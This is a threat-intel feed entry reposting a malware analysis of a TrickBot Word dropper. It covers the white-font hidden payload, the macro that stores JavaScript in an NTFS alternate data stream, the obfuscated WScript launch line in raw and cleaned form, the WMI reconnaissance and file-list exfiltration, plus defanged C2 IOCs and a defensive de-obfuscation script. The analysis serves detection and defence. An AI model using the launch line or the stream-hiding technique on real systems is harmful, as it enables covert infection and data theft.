#1276012: Dissecting the 10k Lines of the new TrickBot Dropper

Description: TrickBot is one of the best-known banking Trojans and has been infecting victims since 2016; it is considered a cyber-crime tool. Nowadays, though, calling it a “Banking Trojan” is quite reductive: over the last years its modularity has brought the malware to a higher level. It can be considered a sort of malicious implant able not only to commit bank-related crimes, but also to provide tools and mechanisms for advanced attackers to penetrate company networks. For instance, several gangs have used it to inoculate Ryuk ransomware within the core server infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report we analyze one of the recently weaponized Word documents spread by TrickBot operators all around the globe, revealing an interesting dropper composed of several thousand highly obfuscated lines of code and abusing the so-called ADS (Alternate Data Stream) feature.
Technical Analysis

Hash: 07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
Threat: Dropper
Brief Description: TrickBot document dropper
Ssdeep: 1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial trick: the attacker simply used a white font to hide the malicious content from the unaware user (and from endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This code will be executed in the next stages of the infection chain, but before digging into the JavaScript we’ll explore the macro code embedded in the malicious document.
Figure 1. Content of Word document

Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is executed automatically when the Word document is opened. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the local file “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1”.
Figure 3. Macro code embedded in the malicious document

Exploring the “\Word\STARTUP” folder we noticed that the “stati_stic.inf” file is zero bytes in size. Actually, the dropper abused an old Windows file system feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional NTFS stream: directory listings and file properties report only the size of the default stream, so the hidden content is invisible there. This known technique, T1096 in the MITRE ATT&CK framework (later re-mapped to T1564.004, NTFS File Attributes), is used simply by appending a colon and the stream name to the filename in any write or read operation. So we extracted the content of the stream through a simple PowerShell command (Get-Content with its -Stream parameter).
Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the content initially hidden in the Word document. The malicious control flow resumes in the “Document_Close()” function, which invokes the “StripAllHidden()” routine. This routine deletes all the hidden information embedded into the document by the attacker, probably with the intent of removing any traces unintentionally left during the development phase. Its code has probably been borrowed from some public snippet such as the one included at the link.

After that, the macro executes the data just written into the “com1” stream. Since the stream contains JavaScript code, it is executed through the WScript utility, whose engine switch (/e:jscript) explicitly selects the JScript engine so that the unusual “.inf:com1” name needs no script extension. The macro uses the following instruction:

CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT" & GroundOn, 0

Which, after a little cleanup, becomes:

CallByName CreateObject("wScript.Shell"), "Run", VbMethod, "powershell wscript /e:jscript ""c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1""", 0

The JavaScript Dropper

Now let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variables and some comments, along with chunks of junk instructions, resulting in a potentially low detection rate.
Figure 5. Example of the sample detection rate

At first glance the attacker’s purpose seems fulfilled: the script is not easily readable and appears extremely complex, with almost 10 thousand lines of code and over 1800 anonymous functions declared in the code.
Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscate every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it always returns zero.
Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

jnabron(102, 'Ch')

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function (102, for instance, yields “f”). Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.
Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpacks its real instructions, making tedious work for the analyst who has to understand the malicious intent of the script. As shown in the following figure, tens of lines of code result in a single instruction containing the real value that will be included in the final script.
Figure 9. Example of de-obfuscation process
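The string-building pattern described above, as an added example that is not part of the original write-up: a small Node.js de-obfuscator for the “jnabron()” / “jnabron00()” idiom. The obfuscated input below is constructed to mimic the sample, not copied from it. It assumes that the integer argument of jnabron() is plain integer arithmetic, possibly padded with jnabron00() terms, and that the resulting single characters are joined with '+'. Anything outside that grammar is refused rather than evaluated, so an unexpected expression fails loudly instead of running attacker code.

```javascript
// Added example (not the dropper's code): de-obfuscate the jnabron()/jnabron00()
// string-building pattern. Assumptions (mine, not from the write-up): the
// jnabron() argument is integer arithmetic over digits, + - * and parentheses,
// jnabron00() is a no-op that returns 0, and characters are glued with '+'.
'use strict';

// Constructed obfuscated snippet in the style of the sample (not the real one).
// It rebuilds the string "ExecQuery" one character at a time.
const SAMPLE = [
  "var q = jnabron(69, 'Ch') + jnabron(120 + jnabron00(), 'Ch') + jnabron((100 + 1), 'Ch')",
  "  + jnabron(99, 'Ch') + jnabron(81 + jnabron00() + jnabron00(), 'Ch') + jnabron(117, 'Ch')",
  "  + jnabron(101, 'Ch') + jnabron(114, 'Ch') + jnabron(121, 'Ch');",
].join('\n');

// jnabron00() always returns 0 (per the write-up), so every call is literally 0.
function dropJnabron00(src) {
  return src.replace(/jnabron00\(\s*\)/g, '0');
}

// Evaluate an integer expression made only of digits, whitespace, parentheses
// and + - *. Anything else is refused, so no attacker-controlled code can run.
function evalIntExpr(expr) {
  if (!/^[\d\s+\-*()]+$/.test(expr)) {
    throw new Error('refusing non-numeric expression: ' + expr);
  }
  return Function('"use strict"; return (' + expr + ');')();
}

// Replace each jnabron(<int expr>, 'Ch') with the one-character literal it yields,
// i.e. exactly what String.fromCharCode(<int>) would return at run time.
function resolveJnabron(src) {
  const call = /jnabron\(([\d\s+\-*()]+),\s*'Ch'\)/g;
  return src.replace(call, (_, expr) => "'" + String.fromCharCode(evalIntExpr(expr)) + "'");
}

// Fold adjacent single-quoted literals joined by '+' (also across line breaks)
// into one literal, repeating until nothing changes.
function foldConcat(src) {
  const pair = /'([^'\\]*)'\s*\+\s*'([^'\\]*)'/g;
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (_, a, b) => "'" + a + b + "'");
  } while (src !== prev);
  return src;
}

// Full pipeline: strip the zero-terms, resolve characters, fold the concatenation.
function deobfuscate(src) {
  return foldConcat(resolveJnabron(dropJnabron00(src)));
}

console.log(deobfuscate(SAMPLE));
```

Run it with node; on the constructed input it prints var q = 'ExecQuery';. Against the real sample the helper names would be taken from the file, and any other wrapper functions the obfuscator introduces would be handled the same way: model what the function provably returns, substitute, then fold.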

After a de-obfuscation phase, some useful values become visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.
Figure 10. C2 checkin code

Analyzing this hidden control flow we discover that the first action performed is the gathering of specific system information. This is done through the WMI interface, specifying a WQL query and invoking the “ExecQuery” function to retrieve:

  • Info about the operating system
  • Info about the machine
  • Info about the current user
  • List of all active processes

Figure 11. Code used to extract information about system

This information, including the list of running processes, is then sent to the command and control server during the check-in phase of the JavaScript loader.
Figure 12. Network traffic

Moreover, the script is able to gather a list of all files having one of the extensions chosen by the attacker: PDF files and Office documents (Word and Excel). The result of this search is written to a local file in the “%TEMP%” folder and later uploaded to the attacker’s infrastructure.
Figure 13. Code to extract absolute paths from specific file types

Conclusion

TrickBot is one of the most active banking Trojans today; it is considered part of the cyber-crime arsenal and is still under development. The malware, which first appeared in 2016, has over the last years added functionalities and exploit capabilities such as the infamous SMB vulnerability (MS17-010), including EternalBlue, EternalRomance and EternalChampion.

The analyzed dropper contains highly obfuscated JavaScript code counting about 10 thousand lines. This new infection chain structure represents an increased threat to companies and users: it can achieve low detection rates, enabling the unnoticed delivery of the TrickBot payload, which can be really dangerous for its victims. Just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks across the whole company IT infrastructure.
First Aid: IOCs:

URLs

hxxp://185[.]180[.]199[.]91/angola/mabutu.php
hxxp://212[.]80[.]216[.]142:443
hxxp://170[.]238[.]117[.]187:8082
hxxp://186[.]10[.]243[.]70:8082
hxxp://190[.]119[.]180[.]226:8082
hxxp://131[.]161[.]105[.]206:8082
hxxp://103[.]116[.]84[.]44:8082
hxxp://200[.]35[.]43[.]105:80
hxxp://103[.]194[.]90[.]242:80
hxxp://103[.]87[.]48[.]54:80
hxxp://190[.]152[.]125[.]162:80
hxxp://103[.]84[.]238[.]3:80
hxxp://192[.]3[.]105[.]136:443
hxxp://54[.]37[.]229[.]180:443
hxxp://192[.]227[.]142[.]155:443
hxxp://23[.]94[.]204[.]80:443
hxxp://5[.]230[.]26[.]41:443
hxxp://45[.]80[.]148[.]236:443
hxxp://185[.]20[.]184[.]74:80
hxxp://188[.]246[.]233[.]53:443
hxxp://92[.]38[.]149[.]49:443
hxxp://103[.]119[.]144[.]250:8082
hxxp://107[.]175[.]132[.]141:443
hxxp://141[.]255[.]167[.]125:443
hxxp://14[.]102[.]107[.]114:8082
hxxp://172[.]97[.]71[.]127:443
hxxp://181[.]115[.]156[.]218:80
hxxp://185[.]117[.]119[.]89:443
hxxp://185[.]20[.]184[.]74
hxxp://192[.]210[.]152[.]173:443
hxxp://200[.]21[.]51[.]30:80
hxxp://212[.]80[.]216[.]228:443
hxxp://212[.]80[.]216[.]69
hxxp://31[.]202[.]132[.]5:443
hxxp://36[.]91[.]93[.]114:80
hxxp://75[.]183[.]130[.]158:8082
hxxp://96[.]36[.]253[.]146:8082
hxxp://97[.]87[.]127[.]198:80
hxxps://212[.]80[.]216[.]69:446

Hashes

07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
731061cfff885671aa5799b5d850d67dc0c808e034ce32cb23e4e3ee3f7fcecf
e2dd0220ce32cfb8905add58f49c30bb118ec75455dc7c0221dae316c3e186bf
0242ebb681eb1b3dbaa751320dea56e31c5e52c8324a7de125a8144cc5270698
2476cd06d32adda664e79b424fe76a6b3c8d2afdb0160bae2e28dc7c38c1c60b
6a6530eb4938910794cbc07a96f03f29333a129c47ca800ea204f47490767af5
3789642a1dfd85c5f9fb0f5d15669e101987aa86f9140a9f736ff1c1f12fc772
9cfb441eb5c60ab1c90b58d4878543ee554ada2cceee98d6b867e73490d30fec
ec19424d113b33d5f68996122b825ef0f877d076974eaaf813c9ea92e97ab04e
ba2a255671d33677cab8d93531eb25c0b1f1ac3e3085b95365a017463662d787
8c353a3ab29d8f23aeb7491c6d8be3353008a952b347d3da6a3bf9f9c2e818c4
8cd75fa8650ebcf0a6200283e474a081cc0be57307e54909ee15f4d04621dde0
2df4672d7ff6de0bb7a15b20c7cc62daf2fdafe1f4a95f9062501e9079b09a5c
1e90a73793017720c9a020069ed1c87879174c19c3b619e5b78db8220a63e9b7
a5f773200ad3251c9cf43df2a8fb88e3e9aa63b62e21cca4fed896ee78778f27
083cb35a7064aa5589efc544ac1ed1b04ec0f89f0e60383fcb1b02b63f4117e9
844974a2d3266e1f9ba275520c0e8a5d176df69a0ccd5135b99facf798a5d209
503438480c715b3b7f2098f78fc33266f2374036b20c8fbd6f806eb4651aaed0
5c9f626665a5f6e91599df85f3a1ae07258b9c3b8fc72eff56082ce9cb2c4394
27f724fb9866b724e24d2950e395e29c59ba45b7acb1ce8875d7f90dd02c4749
8a4155d3f4b1e90f98c4eca76cf305c72abfac1e759c51e103b7e876fcf56cf1
22d9717e29331f658410081d481447b2e4b2619970c64956951e3128202e0985
5b193519c931e7673cffc325a1afe9e9f7396f46e9b8691a3b9fe730d4492054
2810afdda4ba5808722affa4e950679bc94950d85927096383580101693b3b48
398bfdae3412c4b4f2a50d3dcbe2cdb9896d317f9f657cd286535ca5110a936d
6729372d1d97326806dc4e9916be635fd5cfcb1516496b80b4541af91262abcd
02e79a8b9d962fbb161a16d3643d92533273db93ba1a67a1030de27dcb7cda82
fbd51d891687e2087f84e5472fc9e7afe67363c21392a6d1125ca9908840b449
9d47019d9ed24bd979d3484f62818c2e9daef0b2ea75b36899bb0c58c077bd02
ed2288ce8942b7509a9224c18db2e7e7f7a7e34d98acddb103fce7b8e725a2ce
184b50c5b538725c0073f637d9eb49bb2ccbe741aef306ae6a6f1e5e6444b445
5172e485a6eefacb1e47d839492201d0429e6860ecbaa8cf5fb8fb0e24bc795b
More info: https://blog.yoroi.company/research/dissecting-the-10k-lines-of-the-new-trickbot-dropper/

Date added Sept. 11, 2019, 10:26 p.m.
Source Yoroi
Subjects
  • All New Malware or Attack Alerts - New Reports / IOCs in
  • Banking Malware - New Reports in
  • Trickbot / Trik botnet / GOLD BLACKBURN - Banking Trojan